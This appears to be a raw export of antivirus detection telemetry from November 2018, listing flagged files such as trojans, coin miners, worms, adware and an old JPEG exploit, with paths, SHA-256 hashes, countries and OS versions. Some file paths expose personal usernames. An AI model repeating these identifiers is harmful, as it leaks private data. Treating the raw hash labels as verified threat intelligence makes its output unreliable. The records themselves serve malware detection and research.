  Row(detection=Row(filename='avscan-20181104-195838-118f1537', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6048dd9\\AVSCAN-20181104-195732-0A9CA371\\AVSCAN-20181104-195838-118F1537', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160158-b225e427', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_757b9ebd\\AVSCAN-20181104-155608-8775CF5C\\AVSCAN-20181104-160158-B225E427', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:01:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T10:43:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Documents and Settings\\X\\Moje dokumenty\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mstjy.exe', filepath='C:\\ProgramData\\mstjy.exe', filesize=70112000, name='WORM/Lodbak.Gen.#M2.#R7829'), hash='5c54ab809c85d95bace97bc56b16f59c2e0aa0b14db212e7a264d6299aeb0149', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:22:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:47:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173017-16160823', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173017-16160823', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:30:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160112-b27f6580', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-155558-81439129\\AVSCAN-20181104-160112-B27F6580', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:05:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:31:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:26:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191442-f071cad5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc727c94\\AVSCAN-20181104-190515-975C53E3\\AVSCAN-20181104-191442-F071CAD5', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='435b46a9efc0b116328792c0436ee25fab8bff68bf08c26299066126b4181fe7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:14:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103117-613a9656', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_828d9b0e\\AVSCAN-20181104-103100-5E2828A4\\AVSCAN-20181104-103117-613A9656', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:28:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='8577329.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8577329.VIR', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:45:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:32:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:19:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1728000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='12cb1fe75a7d0120749b71938420fe4b62b6beb8dc037e20cbaa100edd3c0755', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T12:35:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T20:08:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:05:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140223-edbaff06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140223-EDBAFF06', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='بيت الرعب.exe', filepath='\\?\\I:\\العاب\\بيت الرعب\\بيت الرعب.EXE', filesize=6144000, name='HEUR/Patched.Ren.#M1.#R1'), hash='d5b861c85d06d23bd5e1ccd73aa832a4e07264a874ea8ee0f4246b28dd6f5653', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:39:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T10:15:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000c022', filepath='C:\\Windows\\Temp\\89ca004b-512f-4b44-93c7-56a4814ce029\\tmp000001e9\\tmp0000c022', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='9f8189ea4c01be26aeb64d5376ceec284c176bf12a4c645c2d7fbaf7ee20e7f1', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.15.1046.10613\\AdAwareService.exe', parentsize=630976, timestamp='2018-11-04T11:06:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mfl_vc9.dll', filepath='C:\\Program Files (x86)\\MAGIX\\Audio Cleaning Lab 2016\\VideoExportMaker\\MFL_VC9.dll', filesize=772000, name='W32/Ramnit.C.#M1.#R1'), hash='8699632edbbbe3aa5850325e8192e7597af1ec7d087dde65a7eb592dc508444f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-04T13:11:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8f6c', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8f6c', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:33:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103414-27bd5b67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_19d05210\\AVSCAN-20181104-103111-143440F4\\AVSCAN-20181104-103414-27BD5B67', filesize=16316000, name='PUA/InstallCore.#M1.#R1'), hash='dcba7753016c23580479032857fb1418af14eb74ff6d025cffdf03178f148ee4', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:34:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='menken.exe', filepath='\\\\?\\C:\\Windows\\menken.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='707434991aa835159ceb7b4756130cb31fe22640ed4295a9c647599d438c00eb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:48:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_170ec789.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_170ec789.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gcaf 4.exe', filepath='i:\\pro evolution soccer 2013 caf 4\\gCAF 4.exe', filesize=20032000, name='W32/Ramnit.CD.#M1.#R1'), hash='b2d6709a4bc8f92eade00ed17357fd3e47af465c53d6f542be6fb9a49d2dc777', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190321-6c171e40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91e5d8a4\\AVSCAN-20181104-190237-63D4E32E\\AVSCAN-20181104-190321-6C171E40', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:03:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8b80', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8b80', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='change sped contabil installation.exe', filepath='C:\\Arquivos de Programas RFB\\Programas SPED\\SpedContabil\\SpedContabil_installation\\Change Sped Contabil Installation.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='a4f89cbfb38f2fe3480813d625b0ce165e6d171343b0b01815f3655f4625c9a6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:31:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nso871D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:32:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='f6f5972035cbd01715ec3b91f4ff8a061748579cbb6b36f4672ce1283baf5ea0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T10:03:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:22:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yywmqo.exe', filepath='c:\\users\\X\\appdata\\roaming\\yywmqo.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T14:26:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Mining\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:53:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Users\\Mélanie\\AppData\\Local\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='92772b5d19769307d8f8765d639ee23d14c178cb14e8578f7255e56d41d4de58', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:01:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134552-1848c531', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dd62ddc2\\AVSCAN-20181102-134533-15C3F24F\\AVSCAN-20181102-134552-1848C531', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:45:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233153-b4a1ec9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_08124b6d\\AVSCAN-20181102-233038-AA23FCE0\\AVSCAN-20181102-233153-B4A1EC9B', filesize=1920000, name='HEUR/APC.#M1.#R1'), hash='b89442f5eafd18a34f7f11922df0a94472ea963498fdda5a594c95d34771dfa4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:31:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152700-505d115d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17893377\\AVSCAN-20181102-152648-4E0A0812\\AVSCAN-20181102-152700-505D115D', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:26:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fbftnggx.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\fBfTNGGx.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='radbd191.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\radBD191.tmp.exe', filesize=192000, name='TR/AD.Bulta.Y.#M1.#R1'), hash='e3786ecd97f36eb1160b9eb50df42a58590d307c4b5e962bc7711bab4f8e7882', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:06:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='invoice_cam.doc', filepath='invoice_cam.doc', filesize=192000, name='HEUR/AGEN.1004823.#M15.#R1004823'), hash='f92e23a4882a395b3b1a1c8cd8bee63422876451f4fb0df3c6efb3829d8c5524', metadata=Row(cmdline=None, country='PA', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:35:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='epysoisi.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\epYsOIsI.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='khmer typing tutor.exe', filepath='\\\\?\\C:\\Program Files\\Typing Programs\\Khmer Typing Tutor\\Khmer Typing Tutor.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='dd129fe12996de064f8c12c86664da35d04812d6f5fdf8fb18f32ba198254937', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:18:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:39:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:57:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085959-b5cb5ae7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-085959-B5CB5AE7', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:01:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lmgmcfra.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\lmgmCfRa.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\g2vhqhaainw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T05:45:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c1ac1bb865024474e2d18e95a9b7dc08bd35751d872cf3042864901d04ab864b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:59:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Documents and Settings\\X\\Belgelerim\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:39:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103746-2e7b8604', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_070ce19e\\AVSCAN-20181102-095737-16A5DC27\\AVSCAN-20181102-103746-2E7B8604', filesize=64000, name='X2000M/Agent.91364890.#M1.#R1'), hash='f1ca9f1eeeedd212e1e20a0cb04b944fb3e82626dc342a16cbb91bc60b5f926c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:37:52Z'), dt=datetime.date(2018, 11, 2)),
